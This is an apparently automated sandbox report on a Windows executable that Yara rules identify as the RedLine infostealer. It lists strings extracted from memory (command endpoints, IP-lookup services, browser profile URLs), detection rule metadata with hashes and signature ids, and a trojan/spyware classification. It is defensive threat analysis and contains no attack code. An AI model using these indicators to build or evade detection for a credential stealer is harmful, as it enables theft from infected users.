Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742706998.0000000006474000.00000004.00000020.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_031F3E28	0_2_031F3E28
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_031F6F90	0_2_031F6F90
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_031FF044	0_2_031FF044
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_065994F0	0_2_065994F0
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_065911FC	0_2_065911FC
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_065935BA	0_2_065935BA
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D79708	0_2_07D79708
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D73E38	0_2_07D73E38
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D73E29	0_2_07D73E29
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D735A8	0_2_07D735A8
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D73A00	0_2_07D73A00
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D759B0	0_2_07D759B0
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 0_2_07D750D8	0_2_07D750D8
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_013EE7B0	2_2_013EE7B0
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_013EDC90	2_2_013EDC90
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067D9630	2_2_067D9630
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067D4468	2_2_067D4468
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067D1210	2_2_067D1210
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067D329F	2_2_067D329F
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067DDD18	2_2_067DDD18
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067DDA24	2_2_067DDA24
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_067DD528	2_2_067DD528
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071FC198	2_2_071FC198
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071FEAC0	2_2_071FEAC0
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071F075A	2_2_071F075A
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071F0768	2_2_071F0768
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071FF258	2_2_071FF258
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071FF248	2_2_071FF248
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Code function: 2_2_071F0CF4	2_2_071F0CF4

Source: 9dOKGgFNL2.exe, 00000000.00000002.1742563541.0000000005E60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1740909601.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000000.1684748049.0000000001074000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenmYV.exe* vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1743705514.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000000.00000002.1740116770.00000000016BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1858196730.0000000001108000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq,\\StringFileInfo\\000004B0\\OriginalFilename vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq,\\StringFileInfo\\040904B0\\OriginalFilename vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fq,\\StringFileInfo\\080904B0\\OriginalFilename vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs 9dOKGgFNL2.exe
Source: 9dOKGgFNL2.exe	Binary or memory string: OriginalFilenamenmYV.exe* vs 9dOKGgFNL2.exe

Source: 9dOKGgFNL2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: 9dOKGgFNL2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: _0020.AddAccessRule
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, iZq82EZ6VPakI888Ti.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, iZq82EZ6VPakI888Ti.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: _0020.SetAccessControl
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/43@1/1

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9dOKGgFNL2.exe.log

Jump to behavior

